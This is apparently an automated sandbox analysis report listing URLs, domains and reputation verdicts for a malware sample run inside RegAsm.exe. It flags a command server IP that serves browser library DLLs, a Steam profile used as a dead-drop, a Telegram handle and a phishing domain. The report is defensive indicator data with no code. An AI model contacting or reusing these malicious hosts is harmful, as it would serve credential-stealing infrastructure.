                  https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&0%URL Reputationsafe
                  http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://store.steampowered.com/points/shop/0%URL Reputationsafe
                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                  https://store.steampowered.com/about/0%URL Reputationsafe
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&0%URL Reputationsafe
                  https://help.steampowered.com/en/0%URL Reputationsafe
                  https://store.steampowered.com/news/0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                  https://steamcommunity.co100%Sophos S4illegal phishing domain
                  https://store.steampowered.com/stats/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=dERfFkkJ-bKK&amp0%Avira URL Cloudsafe
                  https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://95.217.240.101/nss3.dll100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v0%URL Reputationsafe
                  https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                  https://95.217.240.101/nss3.dll2100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&0%Avira URL Cloudsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p0%URL Reputationsafe
                  https://store.steampowered.com/legal/0%URL Reputationsafe
                  http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl0%URL Reputationsafe
                  https://95.217.240.101/freebl3.dll100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=0%URL Reputationsafe
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli0%URL Reputationsafe
                  https://store.steampowered.com/0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                  https://95.217.240.101KJE0%Avira URL Cloudsafe
                  https://steamcommunity.com/login0%Avira URL Cloudsafe
                  https://steamcommunity.com/login/home/?goto=profiles%2F765611996865243220%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK0%Avira URL Cloudsafe
                  https://95.217.240.101FIE0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
                  https://95.217.240.101/softokn3.dll100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/he0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_q0%Avira URL Cloudsafe
                  https://steamcommunity.com/market/0%Avira URL Cloudsafe
                  https://95.217.240.101/msvcp140.dllU100%Avira URL Cloudmalware
                  https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                  https://95.217.240.101100%Avira URL Cloudmalware
                  https://95.217.240.101/freebl3.dlls100%Avira URL Cloudmalware
                  https://95.217.240.101/msvcp140.dll100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis0%Avira URL Cloudsafe
                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                  https://steamcommunity.co100%Avira URL Cloudphishing
                  https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGA0%Avira URL Cloudsafe
                  https://t.me/k0mono100%Avira URL Cloudmalware
                  https://steamcommunity.com/profiles/76561199686524322/badges100%Avira URL Cloudmalware
                  https://steamcommunity.com/profiles/76561199686524322/inventory/100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                  https://95.217.240.101/mozglue.dll100%Avira URL Cloudmalware
                  https://95.217.240.101/softokn3.dllK100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am0%Avira URL Cloudsafe
                  https://95.217.240.101/sqlx.dll100%Avira URL Cloudmalware
                  https://steamcommunity.com/profiles/76561199686524322100%Avira URL Cloudmalware
                  https://95.217.240.101/v100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  		23.194.234.100
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://95.217.240.101/nss3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/freebl3.dlltrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/softokn3.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/msvcp140.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/mozglue.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/sqlx.dllfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199686524322true
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabJEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=JEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://95.217.240.101/nss3.dll2RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=dERfFkkJ-bKK&ampRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engliRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpERegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiIIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://mozilla.org0/nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101KJERegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119968652432276561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/points/shop/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/loginRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=JEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/JEGHDA.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brGCBFBG.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101FIERegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesGDAAKF.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_qRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/about/76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFGCBFBG.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.101/msvcp140.dllURegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://95.217.240.101/freebl3.dllsRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://help.steampowered.com/en/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/market/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/news/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://95.217.240.10176561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englisRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=JEGHDA.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.coRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmptrue
                    • Sophos S4: illegal phishing domain
                    • Avira URL Cloud: phishing
                    		unknown
                    https://steamcommunity.com/discussions/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGARegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/stats/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallGDAAKF.3.drfalse
                    • URL Reputation: safe
                    		unknown
